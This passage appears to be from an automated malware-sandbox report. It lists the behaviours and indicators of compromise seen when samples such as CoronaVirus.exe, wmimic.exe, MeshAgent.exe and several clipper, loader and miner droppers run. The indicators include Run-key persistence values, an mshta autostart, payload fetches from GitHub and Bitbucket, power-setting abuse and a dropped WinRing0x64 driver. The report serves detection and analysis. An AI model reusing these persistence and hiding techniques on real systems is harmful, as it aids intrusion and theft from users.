Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 build.exe Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 build.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KeybordDriver = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Objects\\wmimic.exe\" winstart" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KeybordDriver = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Objects\\wmimic.exe\" winstart" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KeybordDriver = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Objects\\wmimic.exe\" winstart" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" dxwebsetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KeybordDriver = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Objects\\wmimic.exe\" winstart" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KeybordDriver = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Objects\\wmimic.exe\" winstart" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KeybordDriver = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Objects\\wmimic.exe\" winstart" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KeybordDriver = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Objects\\wmimic.exe\" winstart" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KeybordDriver = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Objects\\wmimic.exe\" winstart" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1b2e8379f6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1003674001\\1b2e8379f6.exe" axplong.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KeybordDriver = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Objects\\wmimic.exe\" winstart" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KeybordDriver = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Objects\\wmimic.exe\" winstart" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KeybordDriver = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Objects\\wmimic.exe\" winstart" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CoronaVirus.exe = "C:\\Windows\\System32\\CoronaVirus.exe" CoronaVirus.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KeybordDriver = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Objects\\wmimic.exe\" winstart" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KeybordDriver = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Objects\\wmimic.exe\" winstart" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KeybordDriver = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Objects\\wmimic.exe\" winstart" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KeybordDriver = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Objects\\wmimic.exe\" winstart" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KeybordDriver = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Objects\\wmimic.exe\" winstart" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KeybordDriver = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Objects\\wmimic.exe\" winstart" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KeybordDriver = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Objects\\wmimic.exe\" winstart" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KeybordDriver = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Objects\\wmimic.exe\" winstart" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysvplervcs.exe" a.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KeybordDriver = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Objects\\wmimic.exe\" winstart" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KeybordDriver = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Objects\\wmimic.exe\" winstart" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\My Program = "C:\\Users\\Admin\\AppData\\Local\\MyHiddenFolder\\GlitchClipper.exe" GlitchClipper.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KeybordDriver = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Objects\\wmimic.exe\" winstart" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KeybordDriver = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Objects\\wmimic.exe\" winstart" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KeybordDriver = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Objects\\wmimic.exe\" winstart" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysklnorbcv.exe" 1.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KeybordDriver = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Objects\\wmimic.exe\" winstart" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KeybordDriver = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Objects\\wmimic.exe\" winstart" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KeybordDriver = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Objects\\wmimic.exe\" winstart" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KeybordDriver = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Objects\\wmimic.exe\" winstart" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KeybordDriver = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Objects\\wmimic.exe\" winstart" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KeybordDriver = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Objects\\wmimic.exe\" winstart" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KeybordDriver = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Objects\\wmimic.exe\" winstart" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KeybordDriver = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Objects\\wmimic.exe\" winstart" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KeybordDriver = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Objects\\wmimic.exe\" winstart" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KeybordDriver = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Objects\\wmimic.exe\" winstart" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KeybordDriver = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Objects\\wmimic.exe\" winstart" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\C:\Users\Admin\AppData\Roaming\Info.hta = "mshta.exe \"C:\\Users\\Admin\\AppData\\Roaming\\Info.hta\"" CoronaVirus.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KeybordDriver = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Objects\\wmimic.exe\" winstart" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Users\\Admin\\sysvplervcs.exe" a.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KeybordDriver = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Objects\\wmimic.exe\" winstart" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KeybordDriver = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Objects\\wmimic.exe\" winstart" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KeybordDriver = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Objects\\wmimic.exe\" winstart" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KeybordDriver = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Objects\\wmimic.exe\" winstart" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KeybordDriver = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Objects\\wmimic.exe\" winstart" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KeybordDriver = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Objects\\wmimic.exe\" winstart" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KeybordDriver = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Objects\\wmimic.exe\" winstart" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KeybordDriver = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Objects\\wmimic.exe\" winstart" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KeybordDriver = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Objects\\wmimic.exe\" winstart" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KeybordDriver = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Objects\\wmimic.exe\" winstart" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fd45ee69c3.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1003673001\\fd45ee69c3.exe" axplong.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KeybordDriver = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Objects\\wmimic.exe\" winstart" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KeybordDriver = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Objects\\wmimic.exe\" winstart" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KeybordDriver = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Objects\\wmimic.exe\" winstart" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Terraria-Multiplayer-Fix-Online = "C:\\Users\\Admin\\AppData\\Local\\Terraria-Multiplayer-Fix-Online.exe" XClient.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KeybordDriver = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Objects\\wmimic.exe\" winstart" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KeybordDriver = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Objects\\wmimic.exe\" winstart" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KeybordDriver = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Objects\\wmimic.exe\" winstart" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KeybordDriver = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Objects\\wmimic.exe\" winstart" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KeybordDriver = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Objects\\wmimic.exe\" winstart" reg.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops desktop.ini file(s) 64 IoCs
description ioc Process File opened for modification C:\Users\Public\Music\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Public\Libraries\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini CoronaVirus.exe File opened for modification F:\$RECYCLE.BIN\S-1-5-21-2878641211-696417878-3864914810-1000\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Public\Documents\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Public\Downloads\desktop.ini CoronaVirus.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Public\Desktop\desktop.ini CoronaVirus.exe File opened for modification C:\Program Files\desktop.ini CoronaVirus.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Public\desktop.ini CoronaVirus.exe File opened for modification C:\$Recycle.Bin\S-1-5-21-2878641211-696417878-3864914810-1000\desktop.ini CoronaVirus.exe File opened for modification C:\Program Files (x86)\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Videos\desktop.ini CoronaVirus.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\OneDrive\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Documents\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini CoronaVirus.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini CoronaVirus.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Public\Videos\desktop.ini CoronaVirus.exe File created C:\Windows\assembly\Desktop.ini client.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Links\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Searches\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\3D Objects\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini CoronaVirus.exe File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini CoronaVirus.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI CoronaVirus.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini CoronaVirus.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Music\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini CoronaVirus.exe File opened for modification C:\Windows\assembly\Desktop.ini client.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini CoronaVirus.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\g: wmisecure.exe File opened (read-only) \??\i: wmisecure.exe File opened (read-only) \??\m: wmisecure.exe File opened (read-only) \??\r: wmisecure.exe File opened (read-only) \??\v: wmisecure.exe File opened (read-only) \??\y: wmisecure.exe File opened (read-only) \??\b: wmisecure.exe File opened (read-only) \??\k: wmisecure.exe File opened (read-only) \??\o: wmisecure.exe File opened (read-only) \??\s: wmisecure.exe File opened (read-only) \??\x: wmisecure.exe File opened (read-only) \??\w: wmisecure.exe File opened (read-only) \??\z: wmisecure.exe File opened (read-only) \??\a: wmisecure.exe File opened (read-only) \??\j: wmisecure.exe File opened (read-only) \??\l: wmisecure.exe File opened (read-only) \??\n: wmisecure.exe File opened (read-only) \??\q: wmisecure.exe File opened (read-only) \??\t: wmisecure.exe File opened (read-only) \??\u: wmisecure.exe File opened (read-only) \??\e: wmisecure.exe File opened (read-only) \??\h: wmisecure.exe File opened (read-only) \??\p: wmisecure.exe -
Indicator Removal: Clear Persistence 1 TTPs 1 IoCs
Clear artifacts associated with previously established persistence like scheduletasks on a host.
pid Process 19452 cmd.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 18 IoCs
flow ioc 509 bitbucket.org 710 raw.githubusercontent.com 833 raw.githubusercontent.com 10 raw.githubusercontent.com 346 raw.githubusercontent.com 825 raw.githubusercontent.com 2410 raw.githubusercontent.com 345 raw.githubusercontent.com 415 raw.githubusercontent.com 510 bitbucket.org 689 raw.githubusercontent.com 700 raw.githubusercontent.com 1173 raw.githubusercontent.com 410 raw.githubusercontent.com 428 raw.githubusercontent.com 1174 raw.githubusercontent.com 11 raw.githubusercontent.com 420 raw.githubusercontent.com -
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 604 ipinfo.io 1221 ip-api.com 1772 ip-api.com 2574 ip-api.com 138 ip-api.com 305 ipinfo.io 306 ipinfo.io 602 ipinfo.io -
pid Process 16620 cmd.exe 292 ARP.EXE -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Power Settings 1 TTPs 4 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 40464 powercfg.exe 2916 powercfg.exe 40824 powercfg.exe 40808 powercfg.exe -
Drops file in System32 directory 64 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\dll\wgdi32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\ncrypt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\shlwapi.pdb MeshAgent.exe File opened for modification C:\Windows\System32\libintl-9.dll printui.exe File opened for modification C:\Windows\SysWOW64\wkernel32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\gdiplus.pdb MeshAgent.exe File opened for modification C:\Windows\System32\libcrypto-3-x64.dll printui.exe File created \??\c:\windows\system32\winsvcf\WinRing0x64.sys svchost.exe File opened for modification C:\Windows\SysWOW64\crypt32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\wwin32u.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\comctl32.pdb MeshAgent.exe File created C:\Windows\System32\winsvcf\winlogsvc printui.exe File created C:\Windows\System32\console_zero.exe printui.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\symbols\DLL\dbgcore.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\ntasn1.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\ntasn1.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\bcryptprimitives.pdb MeshAgent.exe File opened for modification C:\Windows\System32\winsvcf\WinRing0x64.sys x590972.exe File opened for modification C:\Windows\SysWOW64\wrpcrt4.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\ole32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dbghelp.pdb MeshAgent.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys MeshAgent.exe File opened for modification C:\Windows\SysWOW64\exe\MeshService.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\wuser32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\oleaut32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\bcryptprimitives.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\shcore.pdb MeshAgent.exe File opened for modification C:\Windows\System32\Tasks\axplong svchost.exe File opened for modification C:\Windows\SysWOW64\DirectX\WebSetup dxwsetup.exe File created C:\Windows\System32\winsvcf\winlogsvc printui.exe File opened for modification C:\Windows\SysWOW64\dll\sechost.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\dbghelp.pdb MeshAgent.exe File opened for modification C:\Windows\System32\libwinpthread-1.dll printui.exe File opened for modification C:\Windows\SysWOW64\dll\wrpcrt4.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\combase.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\directx\websetup\SET2B9F.tmp dxwsetup.exe File opened for modification C:\Windows\SysWOW64\dll\crypt32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\comctl32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\ncrypt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\shlwapi.pdb MeshAgent.exe File created C:\Windows\SysWOW64\directx\websetup\SET2B9E.tmp dxwsetup.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\msvcp_win.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\shell32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\comctl32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\oleaut32.pdb MeshAgent.exe File created \??\c:\windows\system32\winsvcf\x590972.exe 